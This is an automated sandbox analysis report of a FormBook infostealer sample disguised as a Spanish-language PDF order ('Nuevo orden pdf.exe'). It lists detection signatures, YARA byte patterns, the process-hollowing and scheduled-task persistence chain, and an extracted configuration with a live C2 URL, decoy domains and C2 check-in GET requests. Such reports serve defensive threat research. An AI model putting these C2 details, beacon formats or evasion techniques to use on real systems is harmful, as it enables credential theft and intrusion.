Analysis Report Nuevo orden pdf.exe

Overview

General Information

Sample Name: Nuevo orden pdf.exe
Analysis ID: 404237
MD5: 02a32cc05efbf5236a8c0928d3c9170e
SHA1: fa3a639f15116da149b14d832b9255528f0bfe65
SHA256: 5930cfa7dd5664e104c299fce83451021349922b6b02774235eae6bd14fad464
Tags: exe
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Nuevo orden pdf.exe (PID: 5520 cmdline: 'C:\Users\user\Desktop\Nuevo orden pdf.exe' MD5: 02A32CC05EFBF5236A8C0928D3C9170E)
    • schtasks.exe (PID: 204 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\NkwKQPLeekw' /XML 'C:\Users\user\AppData\Local\Temp\tmpA401.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 6196 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6616 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6776 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lovetarot.online/sqxs/"], "decoy": ["creid-network.com", "dinningatcastlehill.com", "fundadilla.com", "fashionmdeasy.com", "magentos6.com", "pushpartybdp.com", "streamingnetwork.xyz", "sevenredwalls.com", "hsuehsun.space", "leanbirthdaycake.com", "rocketmortgagedeceit.com", "cashflowdb.com", "smilebringerdesign.com", "naomicoleclinic.com", "wingsforklift.com", "newsounding.com", "48hrbusinessrescue.pro", "101osthoff456.com", "attleticgreens.com", "xx233.xyz", "niziuantena.com", "photosbyamandajdaniels.com", "udharworld.com", "astrolmass.com", "wzht88.com", "victoriasessionsheroes.com", "thefuture101.com", "sihe08.com", "webingnar.com", "influentialgood.com", "jobdoctorplacements.com", "bankrotstvostavropol.pro", "gracefulfari.com", "bluevistainvestments.com", "poopertroopersct.com", "link-glue.com", "barbequeterie.com", "ajbkscw.com", "janek-sales-training.net", "salesjump.xyz", "whatthefountain.com", "centre-pour-formation.com", "aiocoin.net", "thefreemaskstore.com", "localwow.net", "steven-ross.com", "perennialhh.com", "luxebeautylash.com", "aswahorganic.com", "businesshouse5asidejm.com", "zowjain.com", "mediatraining-toronto.com", "ashtangaway.com", "solutiirecentedemarketing.club", "zgzuqw.com", "timerma.com", "aguaalcalinamexico.com", "tacostio1.com", "karitaz.com", "bismillahbodyoil.com", "c2p.life", "kacgt.com", "fastcincincinnatioffer.com", "michaels.house"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18429:$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:$sqlite3step: 68 34 1C 7B E1
  • 0x18458:$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.RegSvcs.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.RegSvcs.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17629:$sqlite3step: 68 34 1C 7B E1
  • 0x1773c:$sqlite3step: 68 34 1C 7B E1
  • 0x17658:$sqlite3text: 68 38 2A 90 C5
  • 0x1777d:$sqlite3text: 68 38 2A 90 C5
  • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
0.2.Nuevo orden pdf.exe.2e5f580.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
6.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Sigma Overview

System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started | Author: juju4 | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Nuevo orden pdf.exe' , ParentImage: C:\Users\user\Desktop\Nuevo orden pdf.exe, ParentProcessId: 5520, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6196

Signature Overview

            AV Detection:

Antivirus detection for URL or domain
Source: www.lovetarot.online/sqxs/ | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.lovetarot.online/sqxs/"], "decoy": ["creid-network.com", "dinningatcastlehill.com", "fundadilla.com", "fashionmdeasy.com", "magentos6.com", "pushpartybdp.com", "streamingnetwork.xyz", "sevenredwalls.com", "hsuehsun.space", "leanbirthdaycake.com", "rocketmortgagedeceit.com", "cashflowdb.com", "smilebringerdesign.com", "naomicoleclinic.com", "wingsforklift.com", "newsounding.com", "48hrbusinessrescue.pro", "101osthoff456.com", "attleticgreens.com", "xx233.xyz", "niziuantena.com", "photosbyamandajdaniels.com", "udharworld.com", "astrolmass.com", "wzht88.com", "victoriasessionsheroes.com", "thefuture101.com", "sihe08.com", "webingnar.com", "influentialgood.com", "jobdoctorplacements.com", "bankrotstvostavropol.pro", "gracefulfari.com", "bluevistainvestments.com", "poopertroopersct.com", "link-glue.com", "barbequeterie.com", "ajbkscw.com", "janek-sales-training.net", "salesjump.xyz", "whatthefountain.com", "centre-pour-formation.com", "aiocoin.net", "thefreemaskstore.com", "localwow.net", "steven-ross.com", "perennialhh.com", "luxebeautylash.com", "aswahorganic.com", "businesshouse5asidejm.com", "zowjain.com", "mediatraining-toronto.com", "ashtangaway.com", "solutiirecentedemarketing.club", "zgzuqw.com", "timerma.com", "aguaalcalinamexico.com", "tacostio1.com", "karitaz.com", "bismillahbodyoil.com", "c2p.life", "kacgt.com", "fastcincincinnatioffer.com", "michaels.house"]}
Yara detected FormBook
Source: Yara match | File source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\NkwKQPLeekw.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Nuevo orden pdf.exe | Joe Sandbox ML: detected
Source: 6.2.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Nuevo orden pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Nuevo orden pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cmmon32.pdb source: RegSvcs.exe, 00000006.00000002.271574504.0000000000AB0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.498401305.0000000006560000.00000002.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL source: RegSvcs.exe, 00000006.00000002.271574504.0000000000AB0000.00000040.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: cmmon32.exe, 0000000B.00000002.487231083.000000000526F000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.271818263.000000000100F000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.484481118.0000000004E5F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, cmmon32.exe
Source: Binary string: RegSvcs.pdb source: cmmon32.exe, 0000000B.00000002.487231083.000000000526F000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.498401305.0000000006560000.00000002.00000001.sdmp

            Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49728 -> 178.128.103.114:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49728 -> 178.128.103.114:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49728 -> 178.128.103.114:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.lovetarot.online/sqxs/
Source: global traffic | HTTP traffic detected:
    GET /sqxs/?Ef=w0QgkeD38IHRIdpbCIGaty7sV88cqzXhWLmJ40eLjOUR8JRp45mybBQ5KmZt/1kyJcny&ojl0d=RzuhPJ HTTP/1.1
    Host: www.thefuture101.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /sqxs/?Ef=GovnwUyBgs6xiYQW/zP+CA3Z06ENiLPJ6FoyDogwOk1ZQfWjapvzV/e42GR+qjeaq8An&ojl0d=RzuhPJ HTTP/1.1
    Host: www.mediatraining-toronto.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /sqxs/?Ef=rJ59qlVpBd2p2MzE9PeUClXd0JALEtveJTDdwZJeh/IadIDZ7Pe72xE/unf7IFRjfuAh&ojl0d=RzuhPJ HTTP/1.1
    Host: www.bluevistainvestments.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: Joe Sandbox View | IP Address: 184.168.131.241
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: unknown | DNS traffic detected: queries for: www.thefuture101.com
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.16.1
    Date: Tue, 04 May 2021 18:33:17 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 203
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 71 78 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sqxs/ was not found on this server.</p></body></html>
Source: explorer.exe, 00000007.00000000.257802419.000000000F55B000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Nuevo orden pdf.exe | String found in binary or memory: http://vbcity.com/forums/t/51894.aspx
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000007.00000000.255497530.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Nuevo orden pdf.exe | String found in binary or memory: https://github.com/MrCylops
Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: Nuevo orden pdf.exe, 00000000.00000002.228288277.0000000001060000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPE

            System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041A070 NtClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041A120 NtAllocateVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00419F40 NtCreateFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00419FF0 NtReadFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041A09A NtReadFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041A11A NtAllocateVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00419F3A NtCreateFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00419FEB NtReadFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F598F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F599A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59A20 NtResumeThread,LdrInitializeThunk,
